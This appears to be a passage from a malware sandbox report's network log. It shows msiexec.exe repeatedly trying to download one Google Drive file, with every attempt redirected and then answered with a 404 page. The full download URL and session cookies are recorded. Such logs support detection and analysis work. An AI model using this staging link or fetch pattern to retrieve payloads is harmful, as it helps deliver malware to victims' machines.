                                                                                          Content-Security-Policy: script-src 'nonce-_lIDVz7X4GZ-V5juSLMypQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
2025-01-10 14:17:05 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="G8RC57KfbmTaN0aHvYAEiw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49967 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:17:06 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
2025-01-10 14:17:06 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:06 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-Ca2t5MwWG-JO2cIILihIxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49977 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:17:07 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
2025-01-10 14:17:07 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC6wFiivyFR-jzU_7D4PVCfCqCve-wMA0xiI0DibY0iQlVikRIj5p5LpRyQE1iy6ThheSIncrRs
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:07 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-LN5e9uG0OIcbfAkHIs1wXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:07 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7IFiUo766rHe-w0ABREHqg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          8 | 192.168.2.6 | 49985 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:08 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:09 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:08 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: script-src 'nonce-6roxFvSyTPWxH7RXmmqOuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          9 | 192.168.2.6 | 49992 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:09 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:10 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC51A7hdGhdBtxevsupkliTbPUfXTEiuiE5W4peFggR395VIwxZtdQzdGTdVNikZhNMp
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:09 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-wfHNKyHDkVHfbt07Qisp4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:10 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6MmgBy5olIIsdswY_b0LSQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          10 | 192.168.2.6 | 49993 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:10 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:11 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:11 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: script-src 'nonce-iUSS29ZvXO9Spl7jGKjOgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          11 | 192.168.2.6 | 49994 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:11 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:12 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgRAYTFkUW16vrpsJjmJVJfjoR_qIoG6I3L26az4tMRW66segR7eCb1MxpVkKHVdbpB-Y0NavGk
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:12 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-ZuiuguO_nuj0AxguTa4gxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:12 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="opxNqJUM-teVLpbv2firfA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          12 | 192.168.2.6 | 49995 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:13 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:13 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:13 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-FG_gG0y07ug3o__naKNXDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          13 | 192.168.2.6 | 49996 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:14 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:14 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgQFUHouCZrnKkoaErDeSkJyv5vtNJ2qfZRNjOIFl3tu9KhC3ODC7aSnUTuhpTk3UXsw
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:14 GMT
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: script-src 'nonce-MVpHkghoH7BNIKXY7IHbFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:14 UTC  1652               IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2SjHXDx15A_aLunYo2dWlQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
